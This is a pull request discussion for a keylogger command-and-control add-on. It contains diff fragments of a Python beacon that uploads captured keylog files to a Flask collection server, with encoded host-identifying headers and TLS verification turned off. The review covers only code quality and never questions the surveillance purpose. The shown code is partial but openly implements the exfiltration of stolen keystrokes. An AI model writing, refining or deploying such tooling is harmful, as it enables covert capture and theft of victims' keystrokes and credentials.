Additional C2 for Keylog File Retrival

Dr0og opened the pull request:
Written in python but the Agent can be compiled into host specific bins when needed

Commit:
Create klog_beacon.py

C2 agent for rusty-keys

Commit:
Create klog_c2_server.py

Flask Server to be Run with klog_beacon.py agent

hulto commented on klog_beacon.py:
```diff
@@ -0,0 +1,61 @@
+		if(os.path.exists(LINUX_LOCKFILE) == True):
+			blocked = True;
+	##check if enpoint is live after last connection failed
+	if(blocked == True):
```
Is this able to become unblocked?

hulto replied:
Do you need to block?
Would it be better to try, if it fails exit and the try again on the same cycle?

Would make it so you don't have to track state.

Dr0og replied:
You've got a Point, it's probably better to keep it simple, it really doesn't need this blocking capability

hulto commented on klog_beacon.py:
```diff
@@ -0,0 +1,61 @@
+					headers=header_assembly,
+					files={'bbe02f946d5455d74616fc9777557c22': open(logfile, 'r')})
+
+	if(requests_obj.status_code == 200):
```
On 200 exit?

Dr0og replied:
Forgot to put this earlier but in it's current iteration the beacon agent was created with the purpose of having a on external timed execution to make scripting easier

hulto replied:
Ah gotcha.

hulto commented on klog_c2_server.py:
```diff
@@ -0,0 +1,23 @@
+def klog_collect():
+	if request.method == 'POST':
+		klog_file =  request.files["bbe02f946d5455d74616fc9777557c22"]
+		header_list = request.headers.__getitem__('Sn')
```
You should look into using
`request.headers.get('Sn')` I believe it's safer.
It'll return None if the header doesn't exist.

Dr0og replied:
Works well thanks, don't know why I was using that primitive there

hulto commented on klog_c2_server.py:
```diff
@@ -0,0 +1,23 @@
+		header_list = request.headers.__getitem__('Sn')
+		getid_headers = base64.b64decode(request.headers.__getitem__('Nn')) + b'_' + base64.b64decode(request.headers.__getitem__('Sn'))
+		filename = getid_headers + b'_'+ bytes(request.remote_addr, encoding='utf-8') + b'_' +bytes(datetime.now().isoformat(timespec='seconds'), encoding='utf-8')
+		out = klog_file.save(KLOG_UPLOAD_DIR + filename.decode('utf-8'))
```
Can you add a comment about what the filename / unique id looks like hard to tell from the code.

hulto replied:
Hostname won't necessarily be unique, and remote address will likely be the same for everyone 😢

hulto commented on klog_c2_server.py:
```diff
@@ -0,0 +1,23 @@
+		if(out == None):
+			return "[*]C2 Request Successful!"
+		elif(out !=  None):
+			return "[*]C2 Request Error!"
```
If out is an error you should log that to make debugging easier.

hulto replied:
Hostname won't necessarily be unique, and remote address will likely be the same for everyone 😢

hulto reviewed (changes requested):
First pass

Commit:
Update klog_beacon.py

Changed the "blocked" variable to be able to set variable to False
Ln 31-32

Commit:
Update klog_c2_server.py

Made Suggest changes from previous Pull request in Main repo

Dr0og reviewed (commented):
Made the suggested Changes in Commits after the PR but hope that was the right way to handle PRs, I can resubmmit the PR with new changes if needed

Commit:
Update klog_c2_server.py

Added Lines for proper Handling of HEAD method 
ln 32-34

Additional Optional Line for HTTPS support in the Flask server
ln 12

Commit:
Update klog_beacon.py

Added support for self signed certs on with https 
<Note>
This change also may ignore legitimate errors in SSL/TLS protocol so  just keep on an eye on it

hulto commented on klog_c2_server.py:
```diff
@@ -0,0 +1,34 @@
+			sys.stdout.write("\n[*]C2 Request Error! Traceback to follow\n")
+			print(sys.exc_info()[2]) ##Contains Error info for running process
+			return "[*]C2 Request Error!"
+		if request.method == 'HEAD':
```
Is head just being used for connection tests?

Dr0og replied:
Yeah,  but given that the connection tests might be unnecessary thinking I should probably scrap it

hulto reviewed (changes requested):
Some comments

Commit:
Update klog_c2_server.py

Removed Connection Test Code

Commit:
Update klog_beacon.py

Removed Connection Test Code

Commit:
Update klog_c2_server.py

Commit:
Update klog_c2_server.py
